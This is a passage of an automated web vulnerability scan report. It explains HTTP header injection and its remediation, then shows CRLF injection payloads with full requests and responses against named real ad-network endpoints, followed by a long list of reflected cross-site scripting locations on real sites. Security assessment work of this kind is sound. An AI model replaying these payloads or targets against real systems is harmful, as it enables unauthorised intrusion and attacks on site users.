HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
3.1. http://2912a.v.fwmrm.net/ad/l/1 [cr parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://2912a.v.fwmrm.net |
| Path: |
/ad/l/1 |
Issue detail
The value of the cr request parameter is copied into the Location response header. The payload d8d28%0d%0aeb92866aa30 was submitted in the cr parameter. This caused a response containing an injected HTTP header.
Request
GET /ad/l/1?last=1&ct=0&metr=0&s=b035&t=1316221067347346&adid=661886&reid=352172&arid=0&auid=&cn=defaultImpression&et=i&_cc=661886,352172,,12523.,1316221067,1&tpos=&init=1&cr=d8d28%0d%0aeb92866aa30 HTTP/1.1
Host: 2912a.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e5045525d5f4f58455e445a4a423208; _sid="b035_5653126437071259822"; _uid="b035_5653126437071259818"; _vr="1316221067.58849.661884~661886~,"; _cph="1316221067.1103.1.1,"; _sc="sg193954.1316221067.1316221068.28800.0.0,"; _wr="g193954"
|
Response
HTTP/1.1 302 Found
Set-Cookie: _uid="b139_5653128498656399883";expires=Sun, 16 Sep 2012 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g193954~1.1316221551.0,5.1316221758.0,21966.1316221551.0,21967.1316221758.0,^";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1316221757.58849.648140~648142~661884~661886~664345~,1316221527.58849784063c197da02440673a1ca.664345~,1316221526.784063c1d09056819c7a889b.661884~661886~,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cph="1316221670.1103.1.1,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg193954.1316221067.1316221758.28800.0.68412102,";expires=Mon, 17 Oct 2011 01:09:18 GMT;domain=.fwmrm.net;path=/;
Location: d8d28
eb92866aa30
Content-Length: 0
Date: Sat, 17 Sep 2011 01:09:17 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
|
3.2. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/bar/v16-507/d3/jsc/fm.js |
Issue detail
The value of the $ request parameter is copied into the Set-Cookie response header. The payload b4e04%0d%0adcb62044598 was submitted in the $ parameter. This caused a response containing an injected HTTP header.
Request
GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=&$=b4e04%0d%0adcb62044598&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0
|
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:b4e04
dcb62044598,collective728x9057523';expires=Sat, 17 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=92:91:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2624
Connection: close
// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.
var z11=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='b4e04
dcb6
...[SNIP]...
|
3.3. http://d7.zedo.com/utils/ecSet.js [v parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://d7.zedo.com |
| Path: |
/utils/ecSet.js |
Issue detail
The value of the v request parameter is copied into the Set-Cookie response header. The payload 1bc99%0d%0af3d004c45 was submitted in the v parameter. This caused a response containing an injected HTTP header.
Request
GET /utils/ecSet.js?v=1bc99%0d%0af3d004c45&d=.zedo.com HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; aps=2; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24
|
Response
HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 1bc99
f3d004c45;expires=Mon, 17 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "3a9d5cb-1f5-47f2908ed51c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5099
Date: Sat, 17 Sep 2011 01:49:02 GMT
Connection: close
|
3.4. http://usadmm.dotomi.com/dmm/servlet/dmm [rurl parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://usadmm.dotomi.com |
| Path: |
/dmm/servlet/dmm |
Issue detail
The value of the rurl request parameter is copied into the Location response header. The payload f8960%0d%0a9818607d76e was submitted in the rurl parameter. This caused a response containing an injected HTTP header.
Request
GET /dmm/servlet/dmm?rurl=f8960%0d%0a9818607d76e&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000187%2C826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1986338424%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5
|
Response
HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 01:49:27 GMT
X-Name: dmm-s01
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Mon, 16-Sep-2013 01:49:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 01:49:27 GMT; Path=/
Location: http://usadmm.dotomi.com/dmm/servlet/f8960
9818607d76e
Content-Length: 0
Content-Type: text/plain
|
4. Cross-site scripting (reflected)
previous
next
There are 256 instances of this issue:
- http://a.abc.com/service/gremlin/js/files/ifixpng,scrollto,hook,jquery-bbq,jquery-rc4,parseurl,abc-utils,register-loader,social-link,register-abcreg,cookie,msgqueue,swfobject,sendmsg,global,share-global,facebook,facebooklike,autocompleter.js [REST URL parameter 5]
- http://a.abc.com/service/sfp/omnitureconfig/ [pageURL parameter]
- http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]
- http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]
- http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 2]
- http://a.collective-media.net/adj/q1.bosherald/be_news [REST URL parameter 3]
- http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]
- http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]
- http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]
- http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]
- http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]
- http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]
- http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]
- http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 1]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 2]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [REST URL parameter 3]
- http://a.collective-media.net/cmadj/q1.bosherald/be_news [sz parameter]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 1]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 2]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [REST URL parameter 3]
- http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [sz parameter]
- http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 1]
- http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 2]
- http://a.collective-media.net/cmadj/q1.bosherald/news [REST URL parameter 3]
- http://a.collective-media.net/cmadj/q1.bosherald/news [sz parameter]
- http://ad.yieldmanager.com/imp [u parameter]
- http://adnxs.revsci.net/imp [Z parameter]
- http://adnxs.revsci.net/imp [s parameter]
- http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]
- http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]
- http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]
- http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
- http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]
- http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_creative_id parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [ad_referral_url parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_bg parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_border parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_link parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_normal parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [color_text_title parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [default_league parameter]
- http://alerts.4info.com/alert/ads/dispatcher.jsp [default_team parameter]
- http://api.bizographics.com/v2/profile.redirect [api_key parameter]
- http://api.dimestore.com/viapi [id parameter]
- http://ar.voicefive.com/b/rc.pli [func parameter]
- http://b.scorecardresearch.com/beacon.js [c1 parameter]
- http://b.scorecardresearch.com/beacon.js [c10 parameter]
- http://b.scorecardresearch.com/beacon.js [c15 parameter]
- http://b.scorecardresearch.com/beacon.js [c2 parameter]
- http://b.scorecardresearch.com/beacon.js [c3 parameter]
- http://b.scorecardresearch.com/beacon.js [c4 parameter]
- http://b.scorecardresearch.com/beacon.js [c5 parameter]
- http://b.scorecardresearch.com/beacon.js [c6 parameter]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]
- http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]
- http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
- http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
- http://blekko.com/autocomplete [query parameter]
- http://bostonherald.com/includes/processAds.bg [companion parameter]
- http://bostonherald.com/includes/processAds.bg [companion parameter]
- http://bostonherald.com/includes/processAds.bg [page parameter]
- http://bostonherald.com/includes/processAds.bg [page parameter]
- http://bostonherald.com/includes/processAds.bg [position parameter]
- http://bostonherald.com/includes/processAds.bg [position parameter]
- http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
- http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx [callback parameter]
- http://bostonheraldnie.newspaperdirect.com/epaper/check.session [callback parameter]
- http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
- http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]
- http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]
- http://cdnt.meteorsolutions.com/api/track [jsonp parameter]
- http://choices.truste.com/ca [c parameter]
- http://choices.truste.com/ca [cid parameter]
- http://choices.truste.com/ca [iplc parameter]
- http://choices.truste.com/ca [plc parameter]
- http://choices.truste.com/ca [zi parameter]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [$ parameter]
- http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]
- http://event.adxpose.com/event.flow [uid parameter]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]
- http://g2.gumgum.com/services/get [callback parameter]
- http://ib.adnxs.com/ptj [redir parameter]
- http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard [mbox parameter]
- http://imp.fetchback.com/serve/fb/adtag.js [clicktracking parameter]
- http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]
- http://imp.fetchback.com/serve/fb/adtag.js [type parameter]
- http://jcp.org/en/jsr/all [name of an arbitrarily supplied request parameter]
- http://js.revsci.net/gateway/gw.js [ali parameter]
- http://js.revsci.net/gateway/gw.js [cid parameter]
- http://js.revsci.net/gateway/gw.js [clen parameter]
- http://js.revsci.net/gateway/gw.js [csid parameter]
- http://js.revsci.net/gateway/gw.js [p parameter]
- http://js.revsci.net/gateway/gw.js [pid parameter]
- http://js.revsci.net/gateway/gw.js [pli parameter]
- http://js.revsci.net/gateway/gw.js [ref parameter]
- http://js.revsci.net/gateway/gw.js [sid parameter]
- http://js.revsci.net/gateway/gw.js [ver parameter]
- http://js.revsci.net/gateway/gw.js [vid parameter]
- http://livechat.iadvize.com/rpc/referrer.php [get parameter]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_entertainment_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 10]
- http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/auditude_news_video/preroll/vast/sx/ss/a/@x75 [REST URL parameter 4]
- http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 4]
- http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 5]
- http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/video/129334548@x91 [REST URL parameter 6]
- http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090 [callback parameter]
- http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27 [callback parameter]
- http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7 [callback parameter]
- http://pixel.adsafeprotected.com/jspix [anId parameter]
- http://pixel.adsafeprotected.com/jspix [campId parameter]
- http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
- http://pixel.adsafeprotected.com/jspix [pubId parameter]
- http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/crossdomain.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 1]
- http://qa.n7.vp2.abc.go.com/xml/alert.xml [REST URL parameter 2]
- http://query.yahooapis.com/v1/public/yql/uhTrending/cokeTrending2 [limit parameter]
- http://router.infolinks.com/gsd/1316238723013.0 [callback parameter]
- http://router.infolinks.com/gsd/1316238747946.0 [callback parameter]
- http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]
- http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]
- http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]
- http://rt1302.infolinks.com/action/doq.htm [rid parameter]
- http://rt1302.infolinks.com/action/getads.htm [lid parameter]
- http://rt1701.infolinks.com/action/doq.htm [rid parameter]
- http://rt1702.infolinks.com/action/doq.htm [rid parameter]
- http://rt1803.infolinks.com/action/doq.htm [rid parameter]
- http://rt1804.infolinks.com/action/doq.htm [rid parameter]
- http://rt1901.infolinks.com/action/doq.htm [rid parameter]
- http://rt1903.infolinks.com/action/doq.htm [rid parameter]
- http://s19.sitemeter.com/js/counter.asp [site parameter]
- http://s19.sitemeter.com/js/counter.js [site parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [REST URL parameter 2]
- http://secure-us.imrworldwide.com/cgi-bin/m [at parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [ci parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [cr parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [ep parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [name of an arbitrarily supplied request parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [r parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [rt parameter]
- http://secure-us.imrworldwide.com/cgi-bin/m [st parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]
- http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
- http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
- http://tps31.doubleverify.com/visit.js [plc parameter]
- http://tps31.doubleverify.com/visit.js [sid parameter]
- http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [clickData parameter]
- http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet [name of an arbitrarily supplied request parameter]
- http://widgets.mobilelocalnews.com/ [uid parameter]
- http://www-01.ibm.com/support/docview.wss [aid parameter]
- http://www-01.ibm.com/support/docview.wss [name of an arbitrarily supplied request parameter]
- http://www-146.ibm.com/nfluent/transwidget/tw.jsp [cd parameter]
- http://www-146.ibm.com/nfluent/transwidget/tw.jsp [name of an arbitrarily supplied request parameter]
- http://www.bostonherald.com/includes/processAds.bg [companion parameter]
- http://www.bostonherald.com/includes/processAds.bg [companion parameter]
- http://www.bostonherald.com/includes/processAds.bg [page parameter]
- http://www.bostonherald.com/includes/processAds.bg [page parameter]
- http://www.bostonherald.com/includes/processAds.bg [position parameter]
- http://www.bostonherald.com/includes/processAds.bg [position parameter]
- http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]
- http://www.disenter.com/search.php [searchString parameter]
- http://www.disenter.com/search.php [searchString parameter]
- http://www.google.com/search [tch parameter]
- http://www.jcp.org/en/home/index [REST URL parameter 3]
- http://www.jcp.org/en/home/index [name of an arbitrarily supplied request parameter]
- http://www.jcp.org/en/jsr/detail [id parameter]
- http://www.jcp.org/en/jsr/detail [name of an arbitrarily supplied request parameter]
- http://www.kaltura.com//api_v3/index.php [1%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [1%3AentryId parameter]
- http://www.kaltura.com//api_v3/index.php [1%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [2%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [2%3AentryId parameter]
- http://www.kaltura.com//api_v3/index.php [2%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [3%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [3%3AentryId parameter]
- http://www.kaltura.com//api_v3/index.php [3%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [4%3Aaction parameter]
- http://www.kaltura.com//api_v3/index.php [4%3Aservice parameter]
- http://www.kaltura.com//api_v3/index.php [ks parameter]
- http://www.kaltura.com//api_v3/index.php [name of an arbitrarily supplied request parameter]
- http://www.kaltura.com//api_v3/index.php [service parameter]
- http://www.open.com.au/cgi-bin/sf.cgi [config parameter]
- https://www.open.com.au/cgi-bin/sf.cgi [config parameter]
- https://www.open.com.au/onlineorder.php [name of an arbitrarily supplied request parameter]
- http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
- http://www.vm.ibm.com/search/search.cgi [FILTER parameter]
- http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
- http://www.vm.ibm.com/search/search.cgi [WORDS parameter]
- http://www.westhost.com/images/bluegradbg.gif [REST URL parameter 1]
- http://www.westhost.com/images/bluegradbg.gif [name of an arbitrarily supplied request parameter]
- http://www.westhost.com/images/boxtopbackground.gif [REST URL parameter 1]
- http://www.westhost.com/images/boxtopbackground.gif [name of an arbitrarily supplied request parameter]
- http://adnxs.revsci.net/imp [Referer HTTP header]
- http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [Referer HTTP header]
- http://livechat.iadvize.com/chat_init.js [Referer HTTP header]
- http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
- http://www.westhost.com/images/bluegradbg.gif [Referer HTTP header]
- http://www.westhost.com/images/boxtopbackground.gif [Referer HTTP header]
- http://3ps.go.com/DynamicAd [tqq cookie]
